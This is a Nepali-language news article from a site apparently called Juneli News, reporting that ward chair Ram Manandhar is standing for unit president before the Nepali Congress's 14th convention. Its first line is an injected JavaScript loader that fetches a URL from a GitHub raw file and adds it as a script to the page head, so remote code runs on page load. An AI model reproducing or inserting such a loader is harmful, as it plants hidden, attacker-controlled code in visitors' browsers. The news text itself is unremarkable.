;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्युज, काठमाडौं। नेपाली काँग्रेसको १४ औं महाधिवेशनको लागि गोकर्णेश्वर नगरपालिका वडा नं १ का वडा अध्यक्ष राम मानन्धरले इकाई सभापतिको उम्मेदवारी घोषणा गरेका छन्।
काङ्ग्रेस पार्टी समायोजन पश्चात् सह संयोजकको भूमिका निर्वाह गरेका उनी स्थानीय तहको निर्वाचनमा वडा अध्यक्षमा निर्वाचित भई वडाका कार्यभार सम्हाली रहेका छन्।
काठमाडौं क्षेत्र नं ३ मा पनि नेपाली काँग्रेसको चौधौं महाधिवेशनको लागि विभिन्न क्षेत्र देखि इकाई तहसम्म रौनक बढिरहेका बेला वडा अध्यक्ष मानन्धरले आफ्नो उम्मेदवारी घोषणा गरेका छन। काठमाडौं क्षेत्र नं ३ मा काँग्रेसका नेता कार्यकर्ताहरुले भेला, भेटघाटलाई तिब्रता दिदै अधिवेशनबाट योग्य,सक्षम ब्यक्तिहरुलाई नेतृत्वमा पुर्याउन सक्रिय तरिकाले लागिपरेका छन् । कांग्रेसका क्रियाशील सदस्यहरुमाँझ नेताहरु आफ्नो नेतृत्वको दावी सहित जिताउनको लागि लागिपरेका छन् ।
फेसबुक प्रतिक्रियाहरु